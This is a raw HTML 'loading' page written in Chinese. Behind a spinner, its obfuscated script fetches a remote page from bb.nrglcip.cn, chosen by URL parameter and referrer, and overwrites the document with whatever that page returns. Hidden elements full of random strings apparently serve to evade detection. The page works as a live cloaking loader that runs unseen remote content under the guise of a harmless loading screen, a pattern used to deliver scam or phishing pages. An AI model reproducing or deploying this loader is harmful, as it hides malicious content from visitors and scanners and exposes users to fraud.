<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oDDJgS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oDDJgS .DxtueMovt8d {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oDDJgS .content {
            line-height: 50px;
            text-align: center
        }

        .oDDJgS .img {
            width: 100%
        }

        .oDDJgS .coMcj7 {
            text-align: center
        }

        .oDDJgS .coMcj7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oDDJgS .coMcj7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oDDJgS .coMcj7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oDDJgS .coMcj7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oDDJgS .coMcj7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oDDJgS .coMcj7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oDDJgS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VR9LnCSX8PDh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var aFiOs = VR9LnCSX8PDh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ aFiOs +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ aFiOs +".html?a=share";
		}
		
        ngQ9w5=url+"#"+new Date().getTime();
        ngQ9w5 && function() {
            $.get(ngQ9w5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >IyOEpN580hHlMmEaSTiH8MnwR0Yre1ZDYf9PiG1zXyzsG7biprZVFhw8ivYCZ0MxOo49EY75C2Cim4icwrzmDKl</b>
<span style='display:none'>zCFXhurCtYpkB3rRGyHdmWDs5PXVAO9P4surV</span>
<b style='display:none' >IyOEpN580hHlMmEaSTiH8MnwR0Yre1ZDYf9PiG1zXyzsG7biprZVFhw8ivYCZ0MxOo49EY75C2Cim4icwrzmDKl</b><div class="oDDJgS">
    <div class="DxtueMovt8d">
        <div class="coMcj7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >aHNBS5WylkA</li>
<div style='display:none'>E1UlwYEDROjuIDoQMyuDbMFVV9BKvIs6fI06VWixPwvRRnaC1gdf64np36whvSBAQTSqp</div>
<span style='display:none'>PRBusMA579DfGV9mfWpXnH</span></body>
</html>